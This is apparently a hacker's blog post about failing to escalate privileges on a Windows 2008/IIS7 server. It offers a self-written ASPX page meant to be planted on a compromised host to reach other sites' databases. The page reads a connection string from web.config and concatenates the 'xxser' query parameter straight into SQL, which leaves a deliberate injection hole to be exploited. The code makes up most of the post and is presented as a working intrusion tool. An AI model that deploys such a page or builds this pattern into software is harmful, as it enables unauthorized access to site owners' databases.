Yesterday 4z1 and I looked at a site; privilege escalation was very hard to pull off, we spent a full 5 hours on it with no result. 2008 + IIS7, no sa, no root, none of the usual services...
Along the way we used a hand-built aspx injection page to get across to other sites; I found a pile of code online and not one of them worked.
It's not much code, so I just wrote my own. So annoying.
<%@ Page Language="C#" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
    <title>暗影aspx构造注射专用页面</title>
</head>
<body>
<form id="form1" runat="server">
<div>
<script language="C#" runat="server">
    // Runs at page init; AutoEventWireup binds it by name.
    void Page_Init(object sender, EventArgs e)
    {
        // Connection string comes from web.config; "连接名" is the placeholder for its name.
        System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
        conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
        conn.Open();

        // The parameter: ?xxser=1 . It is concatenated directly into the SQL text.
        string i = this.Page.Request.Params["xxser"];
        System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
        // ExecuteNonQuery returns -1 for a SELECT statement.
        int x = command.ExecuteNonQuery();
        Response.Write(i + "\n");
        Response.Write(x);
        conn.Close();
    }
</script>
</div>
</form>
</body>
</html>